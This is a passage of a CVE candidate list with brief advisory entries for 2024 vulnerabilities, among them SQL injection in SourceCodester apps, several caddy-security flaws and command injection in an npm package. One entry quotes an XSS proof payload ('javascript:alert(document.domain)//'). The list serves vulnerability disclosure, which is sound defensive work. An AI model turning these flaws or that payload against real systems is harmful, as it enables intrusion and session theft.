OS * All versions earlier than 20.4R3-S9; * 21.2 versions earlier than 21.2R3-S7; * 21.3 versions earlier than 21.3R3-S5; * 21.4 versions earlier than 21.4R3-S5; * 22.1 versions earlier than 22.1R3-S4; * 22.2 versions earlier than 22.2R3-S3; * 22.3 versions earlier than 22.3R3-S1; * 22.4 versions earlier than 22.4R2-S2, 22.4R3; * 23.2 versions earlier than 23.2R1-S1, 23.2R2. Juniper Networks Junos OS Evolved * All versions earlier than 21.3R3-S5-EVO; * 21.4 versions earlier than 21.4R3-S5-EVO; * 22.1 versions earlier than 22.1R3-S4-EVO; * 22.2 versions earlier than 22.2R3-S3-EVO; * 22.3 versions earlier than 22.3R3-S1-EVO; * 22.4 versions earlier than 22.4R2-S2-EVO, 22.4R3-EVO; * 23.2 versions earlier than 23.2R1-S1-EVO, 23.2R2-EVO. MISC:https://supportportal.juniper.net/JSA75723 | URL:https://supportportal.juniper.net/JSA75723 | MISC:https://supportportal.juniper.net/s/article/MX-GR-and-LLGR-capability-and-compatibility-changes-after-15-1-release | URL:https://supportportal.juniper.net/s/article/MX-GR-and-LLGR-capability-and-compatibility-changes-after-15-1-release | MISC:https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:L | URL:https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:L Assigned (20231227)
CVE 2024 21584 Candidate Pleasanter 1.3.49.0 and earlier contains a cross-site scripting vulnerability. If an attacker tricks the user to access the product with a specially crafted URL and perform a specific operation, an arbitrary script may be executed on the web browser of the user. MISC:https://jvn.jp/en/jp/JVN51135247/ | URL:https://jvn.jp/en/jp/JVN51135247/ | MISC:https://pleasanter.org/archives/vulnerability-update-202401 | URL:https://pleasanter.org/archives/vulnerability-update-202401 Assigned (20231225)
CVE 2024 2156 Candidate A vulnerability was found in SourceCodester Best POS Management System 1.0. It has been classified as critical. Affected is an unknown function of the file admin_class.php. The manipulation of the argument img leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-255588. MISC:VDB-255588 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.255588 | MISC:VDB-255588 | SourceCodester Best POS Management System admin_class.php sql injection | URL:https://vuldb.com/?id.255588 | MISC:https://github.com/wkeyi0x1/vul-report/blob/main/Best%20pos%20management%20system%20in%20php/Report-SQLI-1.md | URL:https://github.com/wkeyi0x1/vul-report/blob/main/Best%20pos%20management%20system%20in%20php/Report-SQLI-1.md Assigned (20240303)
CVE 2024 2155 Candidate A vulnerability was found in SourceCodester Best POS Management System 1.0 and classified as problematic. This issue affects some unknown processing of the file index.php. The manipulation of the argument page leads to file inclusion. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-255587. MISC:VDB-255587 | CTI Indicators (IOB, IOC, IOA) | URL:https://vuldb.com/?ctiid.255587 | MISC:VDB-255587 | SourceCodester Best POS Management System index.php file inclusion | URL:https://vuldb.com/?id.255587 | MISC:https://github.com/wkeyi0x1/vul-report/blob/main/Best%20pos%20management%20system%20in%20php/report.md | URL:https://github.com/wkeyi0x1/vul-report/blob/main/Best%20pos%20management%20system%20in%20php/report.md Assigned (20240303)
CVE 2024 2154 Candidate A vulnerability has been found in SourceCodester Online Mobile Management Store 1.0 and classified as critical. This vulnerability affects unknown code of the file view_product.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-255586 is the identifier assigned to this vulnerability. MISC:VDB-255586 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.255586 | MISC:VDB-255586 | SourceCodester Online Mobile Management Store view_product.php sql injection | URL:https://vuldb.com/?id.255586 | MISC:https://github.com/vanitashtml/CVE-Dumps/blob/main/Unauthenticated%20SQL%20Injection%20-%20Mobile%20Management%20Store.md | URL:https://github.com/vanitashtml/CVE-Dumps/blob/main/Unauthenticated%20SQL%20Injection%20-%20Mobile%20Management%20Store.md Assigned (20240303)
CVE 2024 2153 Candidate A vulnerability, which was classified as critical, was found in SourceCodester Online Mobile Management Store 1.0. This affects an unknown part of the file /admin/orders/view_order.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-255585 was assigned to this vulnerability. MISC:VDB-255585 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.255585 | MISC:VDB-255585 | SourceCodester Online Mobile Management Store view_order.php sql injection | URL:https://vuldb.com/?id.255585 | MISC:https://github.com/vanitashtml/CVE-Dumps/blob/main/SQL%20Injection%20in%20View%20Order%20-%20Mobile%20Management%20Store.md | URL:https://github.com/vanitashtml/CVE-Dumps/blob/main/SQL%20Injection%20in%20View%20Order%20-%20Mobile%20Management%20Store.md Assigned (20240303)
CVE 2024 2152 Candidate A vulnerability, which was classified as critical, has been found in SourceCodester Online Mobile Management Store 1.0. Affected by this issue is some unknown functionality of the file /admin/product/manage_product.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-255584. MISC:VDB-255584 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.255584 | MISC:VDB-255584 | SourceCodester Online Mobile Management Store manage_product.php sql injection | URL:https://vuldb.com/?id.255584 | MISC:https://github.com/vanitashtml/CVE-Dumps/blob/main/SQL%20Injection%20in%20Mobile%20Management%20Store.md | URL:https://github.com/vanitashtml/CVE-Dumps/blob/main/SQL%20Injection%20in%20Mobile%20Management%20Store.md Assigned (20240303)
CVE 2024 2151 Candidate A vulnerability classified as problematic was found in SourceCodester Online Mobile Management Store 1.0. Affected by this vulnerability is an unknown functionality of the component Product Price Handler. The manipulation of the argument quantity with the input -1 leads to business logic errors. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-255583. MISC:VDB-255583 | CTI Indicators (IOB, IOC, IOA) | URL:https://vuldb.com/?ctiid.255583 | MISC:VDB-255583 | SourceCodester Online Mobile Management Store Product Price logic error | URL:https://vuldb.com/?id.255583 | MISC:https://github.com/vanitashtml/CVE-Dumps/blob/main/Business%20Logic%20in%20Mobile%20Management%20Store.md | URL:https://github.com/vanitashtml/CVE-Dumps/blob/main/Business%20Logic%20in%20Mobile%20Management%20Store.md Assigned (20240303)
CVE 2024 21505 Candidate Versions of the package web3-utils before 4.2.1 are vulnerable to Prototype Pollution via the utility functions format and mergeDeep, due to insecure recursive merge. An attacker can manipulate an object's prototype, potentially leading to the alteration of the behavior of all objects inheriting from the affected prototype by passing specially crafted input to these functions. MISC:https://github.com/web3/web3.js/commit/8ed041c6635d807b3da8960ad49e125e3d1b0e80 | URL:https://github.com/web3/web3.js/commit/8ed041c6635d807b3da8960ad49e125e3d1b0e80 | MISC:https://security.snyk.io/vuln/SNYK-JS-WEB3UTILS-6229337 | URL:https://security.snyk.io/vuln/SNYK-JS-WEB3UTILS-6229337 Assigned (20231222)
CVE 2024 21504 Candidate Versions of the package livewire/livewire from 3.3.5 and before 3.4.9 are vulnerable to Cross-site Scripting (XSS) when a page uses [Url] for a property. An attacker can inject HTML code in the context of the user's browser session by crafting a malicious link and convincing the user to click on it. MISC:https://github.com/livewire/livewire/commit/c65b3f0798ab2c9338213ede3588c3cdf4e6fcc0 | URL:https://github.com/livewire/livewire/commit/c65b3f0798ab2c9338213ede3588c3cdf4e6fcc0 | MISC:https://github.com/livewire/livewire/pull/8117 | URL:https://github.com/livewire/livewire/pull/8117 | MISC:https://github.com/livewire/livewire/releases/tag/v3.4.9 | URL:https://github.com/livewire/livewire/releases/tag/v3.4.9 | MISC:https://security.snyk.io/vuln/SNYK-PHP-LIVEWIRELIVEWIRE-6446222 | URL:https://security.snyk.io/vuln/SNYK-PHP-LIVEWIRELIVEWIRE-6446222 Assigned (20231222)
CVE 2024 21503 Candidate Versions of the package black before 24.3.0 are vulnerable to Regular Expression Denial of Service (ReDoS) via the lines_with_leading_tabs_expanded function in the strings.py file. An attacker could exploit this vulnerability by crafting a malicious input that causes a denial of service. Exploiting this vulnerability is possible when running Black on untrusted input, or if you habitually put thousands of leading tab characters in your docstrings. MISC:https://github.com/psf/black/commit/f00093672628d212b8965a8993cee8bedf5fe9b8 | URL:https://github.com/psf/black/commit/f00093672628d212b8965a8993cee8bedf5fe9b8 | MISC:https://github.com/psf/black/releases/tag/24.3.0 | URL:https://github.com/psf/black/releases/tag/24.3.0 | MISC:https://security.snyk.io/vuln/SNYK-PYTHON-BLACK-6256273 | URL:https://security.snyk.io/vuln/SNYK-PYTHON-BLACK-6256273 Assigned (20231222)
CVE 2024 21502 Candidate Versions of the package fastecdsa before 2.3.2 are vulnerable to Use of Uninitialized Variable on the stack, via the curvemath_mul function in src/curveMath.c, due to being used and interpreted as user-defined type. Depending on the variable's actual value it could be arbitrary free(), arbitrary realloc(), null pointer dereference and other. Since the stack can be controlled by the attacker, the vulnerability could be used to corrupt allocator structure, leading to possible heap exploitation. The attacker could cause denial of service by exploiting this vulnerability. MISC:https://gist.github.com/keltecc/49da037072276f21b005a8337c15db26 | URL:https://gist.github.com/keltecc/49da037072276f21b005a8337c15db26 | MISC:https://github.com/AntonKueltz/fastecdsa/blob/v2.3.1/src/curveMath.c%23L210 | URL:https://github.com/AntonKueltz/fastecdsa/blob/v2.3.1/src/curveMath.c%23L210 | MISC:https://github.com/AntonKueltz/fastecdsa/commit/57fc5689c95d649dab7ef60cc99ac64589f01e36 | URL:https://github.com/AntonKueltz/fastecdsa/commit/57fc5689c95d649dab7ef60cc99ac64589f01e36 | MISC:https://security.snyk.io/vuln/SNYK-PYTHON-FASTECDSA-6262045 | URL:https://security.snyk.io/vuln/SNYK-PYTHON-FASTECDSA-6262045 Assigned (20231222)
CVE 2024 21501 Candidate Versions of the package sanitize-html before 2.12.1 are vulnerable to Information Exposure when used on the backend and with the style attribute allowed, allowing enumeration of files in the system (including project dependencies). An attacker could exploit this vulnerability to gather details about the file system structure and dependencies of the targeted server. MISC:https://gist.github.com/Slonser/8b4d061abe6ee1b2e10c7242987674cf | URL:https://gist.github.com/Slonser/8b4d061abe6ee1b2e10c7242987674cf | MISC:https://github.com/apostrophecms/apostrophe/discussions/4436 | URL:https://github.com/apostrophecms/apostrophe/discussions/4436 | MISC:https://github.com/apostrophecms/sanitize-html/commit/c5dbdf77fe8b836d3bf4554ea39edb45281ec0b4 | URL:https://github.com/apostrophecms/sanitize-html/commit/c5dbdf77fe8b836d3bf4554ea39edb45281ec0b4 | MISC:https://github.com/apostrophecms/sanitize-html/pull/650 | URL:https://github.com/apostrophecms/sanitize-html/pull/650 | MISC:https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-6276557 | URL:https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-6276557 | MISC:https://security.snyk.io/vuln/SNYK-JS-SANITIZEHTML-6256334 | URL:https://security.snyk.io/vuln/SNYK-JS-SANITIZEHTML-6256334 Assigned (20231222)
CVE 2024 21500 Candidate All versions of the package github.com/greenpau/caddy-security are vulnerable to Improper Restriction of Excessive Authentication Attempts via the two-factor authentication (2FA). Although the application blocks the user after several failed attempts to provide 2FA codes, attackers can bypass this blocking mechanism by automating the application’s full multistep 2FA process. MISC:https://blog.trailofbits.com/2023/09/18/security-flaws-in-an-sso-plugin-for-caddy/ | URL:https://blog.trailofbits.com/2023/09/18/security-flaws-in-an-sso-plugin-for-caddy/ | MISC:https://github.com/greenpau/caddy-security/issues/271 | URL:https://github.com/greenpau/caddy-security/issues/271 | MISC:https://security.snyk.io/vuln/SNYK-GOLANG-GITHUBCOMGREENPAUCADDYSECURITY-6249864 | URL:https://security.snyk.io/vuln/SNYK-GOLANG-GITHUBCOMGREENPAUCADDYSECURITY-6249864 Assigned (20231222)
CVE 2024 2150 Candidate A vulnerability, which was classified as critical, has been found in SourceCodester Insurance Management System 1.0. This issue affects some unknown processing. The manipulation of the argument page leads to file inclusion. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-255503. MISC:VDB-255503 | CTI Indicators (IOB, IOC, IOA) | URL:https://vuldb.com/?ctiid.255503 | MISC:VDB-255503 | SourceCodester Insurance Management System file inclusion | URL:https://vuldb.com/?id.255503 | MISC:https://github.com/wkeyi0x1/vul-report/blob/main/Insurance%20Management%20System%20PHP%20and%20MySQL/Insurance%20Management%20System%20PHP%20and%20MySQL%20v1.0%20-%20File%20Inclusion.md | URL:https://github.com/wkeyi0x1/vul-report/blob/main/Insurance%20Management%20System%20PHP%20and%20MySQL/Insurance%20Management%20System%20PHP%20and%20MySQL%20v1.0%20-%20File%20Inclusion.md Assigned (20240302)
CVE 2024 21499 Candidate All versions of the package github.com/greenpau/caddy-security are vulnerable to HTTP Header Injection via the X-Forwarded-Proto header due to redirecting to the injected protocol.Exploiting this vulnerability could lead to bypass of security mechanisms or confusion in handling TLS. MISC:https://blog.trailofbits.com/2023/09/18/security-flaws-in-an-sso-plugin-for-caddy/ | URL:https://blog.trailofbits.com/2023/09/18/security-flaws-in-an-sso-plugin-for-caddy/ | MISC:https://github.com/greenpau/caddy-security/issues/270 | URL:https://github.com/greenpau/caddy-security/issues/270 | MISC:https://security.snyk.io/vuln/SNYK-GOLANG-GITHUBCOMGREENPAUCADDYSECURITY-6249863 | URL:https://security.snyk.io/vuln/SNYK-GOLANG-GITHUBCOMGREENPAUCADDYSECURITY-6249863 Assigned (20231222)
CVE 2024 21498 Candidate All versions of the package github.com/greenpau/caddy-security are vulnerable to Server-side Request Forgery (SSRF) via X-Forwarded-Host header manipulation. An attacker can expose sensitive information, interact with internal services, or exploit other vulnerabilities within the network by exploiting this vulnerability. MISC:https://blog.trailofbits.com/2023/09/18/security-flaws-in-an-sso-plugin-for-caddy/ | URL:https://blog.trailofbits.com/2023/09/18/security-flaws-in-an-sso-plugin-for-caddy/ | MISC:https://github.com/greenpau/caddy-security/issues/269 | URL:https://github.com/greenpau/caddy-security/issues/269 | MISC:https://security.snyk.io/vuln/SNYK-GOLANG-GITHUBCOMGREENPAUCADDYSECURITY-6249862 | URL:https://security.snyk.io/vuln/SNYK-GOLANG-GITHUBCOMGREENPAUCADDYSECURITY-6249862 Assigned (20231222)
CVE 2024 21497 Candidate All versions of the package github.com/greenpau/caddy-security are vulnerable to Open Redirect via the redirect_url parameter. An attacker could perform a phishing attack and trick users into visiting a malicious website by crafting a convincing URL with this parameter. To exploit this vulnerability, the user must take an action, such as clicking on a portal button or using the browser’s back button, to trigger the redirection. MISC:https://blog.trailofbits.com/2023/09/18/security-flaws-in-an-sso-plugin-for-caddy/ | URL:https://blog.trailofbits.com/2023/09/18/security-flaws-in-an-sso-plugin-for-caddy/ | MISC:https://github.com/greenpau/caddy-security/issues/268 | URL:https://github.com/greenpau/caddy-security/issues/268 | MISC:https://security.snyk.io/vuln/SNYK-GOLANG-GITHUBCOMGREENPAUCADDYSECURITY-6249861 | URL:https://security.snyk.io/vuln/SNYK-GOLANG-GITHUBCOMGREENPAUCADDYSECURITY-6249861 Assigned (20231222)
CVE 2024 21496 Candidate All versions of the package github.com/greenpau/caddy-security are vulnerable to Cross-site Scripting (XSS) via the Referer header, due to improper input sanitization. Although the Referer header is sanitized by escaping some characters that can allow XSS (e.g., [&], [<], [>], ["], [']), it does not account for the attack based on the JavaScript URL scheme (e.g., javascript:alert(document.domain)// payload). Exploiting this vulnerability may not be trivial, but it could lead to the execution of malicious scripts in the context of the target user’s browser, compromising user sessions. MISC:https://blog.trailofbits.com/2023/09/18/security-flaws-in-an-sso-plugin-for-caddy/ | URL:https://blog.trailofbits.com/2023/09/18/security-flaws-in-an-sso-plugin-for-caddy/ | MISC:https://github.com/greenpau/caddy-security/issues/267 | URL:https://github.com/greenpau/caddy-security/issues/267 | MISC:https://security.snyk.io/vuln/SNYK-GOLANG-GITHUBCOMGREENPAUCADDYSECURITY-6249860 | URL:https://security.snyk.io/vuln/SNYK-GOLANG-GITHUBCOMGREENPAUCADDYSECURITY-6249860 Assigned (20231222)
CVE 2024 21495 Candidate Versions of the package github.com/greenpau/caddy-security before 1.0.42 are vulnerable to Insecure Randomness due to using an insecure random number generation library which could possibly be predicted via a brute-force search. Attackers could use the potentially predictable nonce value used for authentication purposes in the OAuth flow to conduct OAuth replay attacks. In addition, insecure randomness is used while generating multifactor authentication (MFA) secrets and creating API keys in the database package. MISC:https://blog.trailofbits.com/2023/09/18/security-flaws-in-an-sso-plugin-for-caddy/ | URL:https://blog.trailofbits.com/2023/09/18/security-flaws-in-an-sso-plugin-for-caddy/ | MISC:https://github.com/greenpau/caddy-security/issues/265 | URL:https://github.com/greenpau/caddy-security/issues/265 | MISC:https://github.com/greenpau/go-authcrunch/commit/ecd3725baf2683eb1519bb3c81ae41085fbf7dc2 | URL:https://github.com/greenpau/go-authcrunch/commit/ecd3725baf2683eb1519bb3c81ae41085fbf7dc2 | MISC:https://security.snyk.io/vuln/SNYK-GOLANG-GITHUBCOMGREENPAUCADDYSECURITY-6248275 | URL:https://security.snyk.io/vuln/SNYK-GOLANG-GITHUBCOMGREENPAUCADDYSECURITY-6248275 Assigned (20231222)
CVE 2024 21494 Candidate All versions of the package github.com/greenpau/caddy-security are vulnerable to Authentication Bypass by Spoofing via the X-Forwarded-For header due to improper input sanitization. An attacker can spoof an IP address used in the user identity module (/whoami API endpoint). This could lead to unauthorized access if the system trusts this spoofed IP address. MISC:https://blog.trailofbits.com/2023/09/18/security-flaws-in-an-sso-plugin-for-caddy/ | URL:https://blog.trailofbits.com/2023/09/18/security-flaws-in-an-sso-plugin-for-caddy/ | MISC:https://github.com/greenpau/caddy-security/issues/266 | URL:https://github.com/greenpau/caddy-security/issues/266 | MISC:https://security.snyk.io/vuln/SNYK-GOLANG-GITHUBCOMGREENPAUCADDYSECURITY-6249859 | URL:https://security.snyk.io/vuln/SNYK-GOLANG-GITHUBCOMGREENPAUCADDYSECURITY-6249859 Assigned (20231222)
CVE 2024 21493 Candidate All versions of the package github.com/greenpau/caddy-security are vulnerable to Improper Validation of Array Index when parsing a Caddyfile. Multiple parsing functions in the affected library do not validate whether their input values are nil before attempting to access elements, which can lead to a panic (index out of range). Panics during the parsing of a configuration file may introduce ambiguity and vulnerabilities, hindering the correct interpretation and configuration of the web server. MISC:https://blog.trailofbits.com/2023/09/18/security-flaws-in-an-sso-plugin-for-caddy/ | URL:https://blog.trailofbits.com/2023/09/18/security-flaws-in-an-sso-plugin-for-caddy/ | MISC:https://github.com/greenpau/caddy-security/issues/263 | URL:https://github.com/greenpau/caddy-security/issues/263 | MISC:https://security.snyk.io/vuln/SNYK-GOLANG-GITHUBCOMGREENPAUCADDYSECURITY-5961078 | URL:https://security.snyk.io/vuln/SNYK-GOLANG-GITHUBCOMGREENPAUCADDYSECURITY-5961078 Assigned (20231222)
CVE 2024 21492 Candidate All versions of the package github.com/greenpau/caddy-security are vulnerable to Insufficient Session Expiration due to improper user session invalidation upon clicking the "Sign Out" button. User sessions remain valid even after requests are sent to /logout and /oauth2/google/logout. Attackers who gain access to an active but supposedly logged-out session can perform unauthorized actions on behalf of the user. MISC:https://blog.trailofbits.com/2023/09/18/security-flaws-in-an-sso-plugin-for-caddy/ | URL:https://blog.trailofbits.com/2023/09/18/security-flaws-in-an-sso-plugin-for-caddy/ | MISC:https://github.com/greenpau/caddy-security/issues/272 | URL:https://github.com/greenpau/caddy-security/issues/272 | MISC:https://security.snyk.io/vuln/SNYK-GOLANG-GITHUBCOMGREENPAUCADDYSECURITY-5920787 | URL:https://security.snyk.io/vuln/SNYK-GOLANG-GITHUBCOMGREENPAUCADDYSECURITY-5920787 Assigned (20231222)
CVE 2024 21491 Candidate Versions of the package svix before 1.17.0 are vulnerable to Authentication Bypass due to an issue in the verify function where signatures of different lengths are incorrectly compared. An attacker can bypass signature verification by providing a shorter signature that matches the beginning of the actual signature. **Note:** The attacker would need to know a victim uses the Rust library for verification,no easy way to automatically check that; and uses webhooks by a service that uses Svix, and then figure out a way to craft a malicious payload that will actually include all of the correct identifiers needed to trick the receivers to cause actual issues. MISC:https://github.com/svix/svix-webhooks/commit/958821bd3b956d1436af65f70a0964d4ffb7daf6 | URL:https://github.com/svix/svix-webhooks/commit/958821bd3b956d1436af65f70a0964d4ffb7daf6 | MISC:https://github.com/svix/svix-webhooks/pull/1190 | URL:https://github.com/svix/svix-webhooks/pull/1190 | MISC:https://rustsec.org/advisories/RUSTSEC-2024-0010.html | URL:https://rustsec.org/advisories/RUSTSEC-2024-0010.html | MISC:https://security.snyk.io/vuln/SNYK-RUST-SVIX-6230729 | URL:https://security.snyk.io/vuln/SNYK-RUST-SVIX-6230729 Assigned (20231222)
CVE 2024 21490 Candidate This affects versions of the package angular from 1.3.0. A regular expression used to split the value of the ng-srcset directive is vulnerable to super-linear runtime due to backtracking. With large carefully-crafted input, this can result in catastrophic backtracking and cause a denial of service. **Note:** This package is EOL and will not receive any updates to address this issue. Users should migrate to [@angular/core](https://www.npmjs.com/package/@angular/core). MISC:https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWER-6241746 | URL:https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWER-6241746 | MISC:https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-6241747 | URL:https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-6241747 | MISC:https://security.snyk.io/vuln/SNYK-JS-ANGULAR-6091113 | URL:https://security.snyk.io/vuln/SNYK-JS-ANGULAR-6091113 | MISC:https://stackblitz.com/edit/angularjs-vulnerability-ng-srcset-redos | URL:https://stackblitz.com/edit/angularjs-vulnerability-ng-srcset-redos Assigned (20231222)
CVE 2024 2149 Candidate A vulnerability classified as critical was found in CodeAstro Membership Management System 1.0. This vulnerability affects unknown code of the file settings.php. The manipulation of the argument currency leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-255502 is the identifier assigned to this vulnerability. MISC:VDB-255502 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.255502 | MISC:VDB-255502 | CodeAstro Membership Management System settings.php sql injection | URL:https://vuldb.com/?id.255502 | MISC:https://github.com/JiaDongGao1/CVE_Hunter/blob/main/SQLi-2.md | URL:https://github.com/JiaDongGao1/CVE_Hunter/blob/main/SQLi-2.md Assigned (20240302)
CVE 2024 21488 Candidate Versions of the package network before 0.7.0 are vulnerable to Arbitrary Command Injection due to use of the child_process exec function without input sanitization. If (attacker-controlled) user input is given to the mac_address_for function of the package, it is possible for the attacker to execute arbitrary commands on the operating system that this package is being run on. MISC:https://gist.github.com/icemonster/282ab98fb68fc22aac7c576538f6369c | URL:https://gist.github.com/icemonster/282ab98fb68fc22aac7c576538f6369c | MISC:https://github.com/tomas/network/commit/5599ed6d6ff1571a5ccadea775430c131f381de7 | URL:https://github.com/tomas/network/commit/5599ed6d6ff1571a5ccadea775430c131f381de7 | MISC:https://github.com/tomas/network/commit/6ec8713580938ab4666df2f2d0f3399891ed2ad7 | URL:https://github.com/tomas/network/commit/6ec8713580938ab4666df2f2d0f3399891ed2ad7 | MISC:https://github.com/tomas/network/commit/72c523265940fe279eb0050d441522628f8988e5 | URL:https://github.com/tomas/network/commit/72c523265940fe279eb0050d441522628f8988e5 | MISC:https://security.snyk.io/vuln/SNYK-JS-NETWORK-6184371 | URL:https://security.snyk.io/vuln/SNYK-JS-NETWORK-6184371 Assigned (20231222)
CVE 2024 21485 Candidate Versions of the package dash-core-components before 2.13.0; versions of the package dash-core-components before 2.0.0; versions of the package dash before 2.15.0; versions of the package dash-html-components before 2.0.0; versions of the package dash-html-components before 2.0.16 are vulnerable to Cross-site Scripting (XSS) when the href of the a tag is controlled by an adversary. An authenticated attacker who stores a view that exploits this vulnerability could steal the data that's visible to another user who opens that view - not just the data already included on the page, but they could also, in theory, make additional requests and access other data accessible to this user. In some cases, they could also steal the access tokens of that user, which would allow the attacker to act as that user, including viewing other apps and resources hosted on the same server. **Note:** This is only exploitable in Dash apps that include some mechanism to store user input to be reloaded by a different user. MISC:https://github.com/plotly/dash/commit/9920073c9a8619ae8f90fcec1924f2f3a4332a8c | URL:https://github.com/plotly/dash/commit/9920073c9a8619ae8f90fcec1924f2f3a4332a8c | MISC:https://github.com/plotly/dash/issues/2729 | URL:https://github.com/plotly/dash/issues/2729 | MISC:https://github.com/plotly/dash/pull/2732 | URL:https://github.com/plotly/dash/pull/2732 | MISC:https://github.com/plotly/dash/releases/tag/v2.15.0 | URL:https://github.com/plotly/dash/releases/tag/v2.15.0 | MISC:https://security.snyk.io/vuln/SNYK-JS-DASHCORECOMPONENTS-6183084 | URL:https://security.snyk.io/vuln/SNYK-JS-DASHCORECOMPONENTS-6183084 | MISC:https://security.snyk.io/vuln/SNYK-JS-DASHHTMLCOMPONENTS-6226337 | URL:https://security.snyk.io/vuln/SNYK-JS-DASHHTMLCOMPONENTS-6226337 | MISC:https://security.snyk.io/vuln/SNYK-PYTHON-DASH-6226335 | URL:https://security.snyk.io/vuln/SNYK-PYTHON-DASH-6226335 | MISC:https://security.snyk.io/vuln/SNYK-PYTHON-DASHCORECOMPONENTS-6226334 | URL:https://security.snyk.io/vuln/SNYK-PYTHON-DASHCORECOMPONENTS-6226334 | MISC:https://security.snyk.io/vuln/SNYK-PYTHON-DASHHTMLCOMPONENTS-6226336 | URL:https://security.snyk.io/vuln/SNYK-PYTHON-DASHHTMLCOMPONENTS-6226336 Assigned (20231222)
CVE 2024 21484 Candidate Versions of the package jsrsasign before 11.0.0 are vulnerable to Observable Discrepancy via the RSA PKCS1.5 or RSAOAEP decryption process. An attacker can decrypt ciphertexts by exploiting the Marvin security flaw. Exploiting this vulnerability requires the attacker to have access to a large number of ciphertexts encrypted with the same key. Workaround The vulnerability can be mitigated by finding and replacing RSA and RSAOAEP decryption with another crypto library. MISC:https://github.com/kjur/jsrsasign/issues/598 | URL:https://github.com/kjur/jsrsasign/issues/598 | MISC:https://github.com/kjur/jsrsasign/releases/tag/11.0.0 | URL:https://github.com/kjur/jsrsasign/releases/tag/11.0.0 | MISC:https://people.redhat.com/~hkario/marvin/ | URL:https://people.redhat.com/~hkario/marvin/ | MISC:https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWER-6070734 | URL:https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWER-6070734 | MISC:https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWERGITHUBKJUR-6070733 | URL:https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWERGITHUBKJUR-6070733 | MISC:https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-6070732 | URL:https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-6070732 | MISC:https://security.snyk.io/vuln/SNYK-JS-JSRSASIGN-6070731 | URL:https://security.snyk.io/vuln/SNYK-JS-JSRSASIGN-6070731 Assigned (20231222)
CVE 2024 21483 Candidate A vulnerability has been identified in SENTRON 7KM PAC3120 AC/DC (7KM3120-0BA01-1DA0) (All versions >= V3.2.3 < V3.3.0 only when manufactured between LQN231003... and LQN231215... ( with LQNYYMMDD...)), SENTRON 7KM PAC3120 DC (7KM3120-1BA01-1EA0) (All versions >= V3.2.3 < V3.3.0 only when manufactured between LQN231003... and LQN231215... ( with LQNYYMMDD...)), SENTRON 7KM PAC3220 AC/DC (7KM3220-0BA01-1DA0) (All versions >= V3.2.3 < V3.3.0 only when manufactured between LQN231003... and LQN231215... ( with LQNYYMMDD...)), SENTRON 7KM PAC3220 DC (7KM3220-1BA01-1EA0) (All versions >= V3.2.3 < V3.3.0 only when manufactured between LQN231003... and LQN231215... ( with LQNYYMMDD...)). The read out protection of the internal flash of affected devices was not properly set at the end of the manufacturing process. An attacker with physical access to the device could read out the data. MISC:https://cert-portal.siemens.com/productcert/html/ssa-792319.html | URL:https://cert-portal.siemens.com/productcert/html/ssa-792319.html Assigned (20231220)
CVE 2024 2148 Candidate A vulnerability classified as critical has been found in SourceCodester Online Mobile Management Store 1.0. This affects an unknown part of the file /classes/Users.php. The manipulation of the argument img leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-255501 was assigned to this vulnerability. MISC:VDB-255501 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.255501 | MISC:VDB-255501 | SourceCodester Online Mobile Management Store Users.php unrestricted upload | URL:https://vuldb.com/?id.255501 | MISC:https://github.com/vanitashtml/CVE-Dumps/blob/main/RCE%20via%20Arbitrary%20File%20Upload%20in%20Mobile%20Management%20Store.md | URL:https://github.com/vanitashtml/CVE-Dumps/blob/main/RCE%20via%20Arbitrary%20File%20Upload%20in%20Mobile%20Management%20Store.md Assigned (20240302)
